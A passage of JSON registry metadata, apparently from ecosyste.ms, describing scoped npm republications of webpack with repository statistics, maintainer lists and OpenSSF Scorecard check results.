.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-09-02T10:11:25.301Z","dependent_packages_count":2,"downloads":14,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":45.76322889354142,"dependent_repos_count":25.32799796580169,"dependent_packages_count":9.4821380216761,"stargazers_count":0.08536163435776917,"forks_count":0.5292421330181689,"average":16.237593729679027},"purl":"pkg:npm/%40etec/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@etec/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@etec/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@etec/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-01T23:40:35.370Z","issues_count":10174,"pull_requests_count":9492,"avg_time_to_close_issue":10840900.131334545,"avg_time_to_close_pull_request":2760979.2267845157,"issues_closed_count":9906,"pull_requests_closed_count":8938,"pull_request_authors_count":1446,"issue_authors_count":6693,"avg_comments_per_issue":5.830646746609004,"avg_comments_per_pull_request":3.1940581542351456,"merged_pull_requests_count":6057,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":89,"past_year_pull_requests_count":977,"past_year_avg_time_to_close_issue":763936.6,"past_year_avg_time_to_close_pull_request":402666.43094629154,"past_year_issues_closed_count":65,"past_year_pull_requests_closed_count":782,"past_year_pull_request_authors_count":81,"past_year_issue_authors_count":70,"past_year_avg_comments_per_issue":3.2134831460674156,"past_year_avg_comments_per_pull_request":4.976458546571136,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":613,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1107,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":133,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":113,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":456,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":88,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@etec%2Fwebpack/codemeta","maintainers":[{"uuid":"theoton","login":"theoton","name":null,"email":"394347566@qq.com","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~theoton","role":null,"created_at":"2022-11-20T15:07:33.591Z","updated_at":"2022-11-20T15:07:33.591Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/theoton/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":14477720,"name":"@eriche/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"eriche","versions_count":2,"first_release_published_at":"2026-05-19T22:58:51.502Z","latest_release_published_at":"2026-05-19T23:02:16.664Z","latest_release_number":"4.47.1","last_synced_at":"2026-09-03T00:16:45.582Z","created_at":"2026-05-19T23:02:25.067Z","updated_at":"2026-09-03T00:16:45.582Z","registry_url":"https://www.npmjs.com/package/@eriche/webpack","install_command":"npm install @eriche/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"4.47.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed 